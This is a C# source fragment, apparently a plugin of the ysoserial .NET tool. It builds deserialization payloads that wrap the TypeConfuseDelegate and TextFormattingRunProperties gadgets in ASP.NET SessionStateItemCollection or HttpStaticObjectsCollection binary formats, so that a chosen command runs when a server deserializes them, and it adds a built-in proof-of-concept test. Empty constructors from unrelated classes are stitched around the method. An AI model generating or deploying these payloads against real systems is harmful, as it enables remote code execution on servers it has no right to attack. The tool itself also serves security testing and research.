// Constructors
public SessionStateStoreData(ISessionStateItemCollection sessionItems, System.Web.HttpStaticObjectsCollection staticObjects, int timeout)
{
}
public object Run(string[] args)
{
InputArgs inputArgs = new InputArgs();
List <string> extra;
try
{
extra = options.Parse(args);
inputArgs.Cmd = command;
inputArgs.Minify = minify;
inputArgs.UseSimpleType = useSimpleType;
inputArgs.Test = test;
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
object payload = "";
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
if (mode.ToLower().Equals("sessionstateitemcollection"))
{
/* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */
/* hacky way begin
* byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
* byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem
* tempPayload_init.CopyTo(tempPayload, 0);
* System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
* items[""] = tempPayload;
* MemoryStream stream = new MemoryStream();
* BinaryWriter writer = new BinaryWriter(stream);
* items.Serialize(writer);
* stream.Flush();
* tempPayload = stream.ToArray();
* byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical!
* Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes
* Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte
* newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
* // hacky way ends */
/* here it is using the sane way! */
object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection();
items[""] = serializedData;
MemoryStream stream = new MemoryStream();
BinaryWriter writer = new BinaryWriter(stream);
items.Serialize(writer);
stream.Flush();
payload = stream.ToArray();
if (test)
{
// PoC on how it works in practice
stream = new MemoryStream((byte[])payload);
BinaryReader binReader = new BinaryReader(stream);
System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader);
test.GetEnumerator();
}
}
else
{
// HttpStaticObjectsCollection
byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
serializedData.CopyTo(newSerializedData, 7);
newSerializedData[0] = 1; // for ReadInt32
newSerializedData[5] = 1; // for ReadBoolean
newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream
payload = newSerializedData;
if (test)
{
// PoC on how it works in practice
try {
MemoryStream stream = new MemoryStream((byte[])payload);
BinaryReader binReader = new BinaryReader(stream);
System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
}
return(payload);
}
// Constructors
public HttpSessionStateContainer(string id, ISessionStateItemCollection sessionItems, System.Web.HttpStaticObjectsCollection staticObjects, int timeout, bool newSession, System.Web.HttpCookieMode cookieMode, SessionStateMode mode, bool isReadonly)
{
}
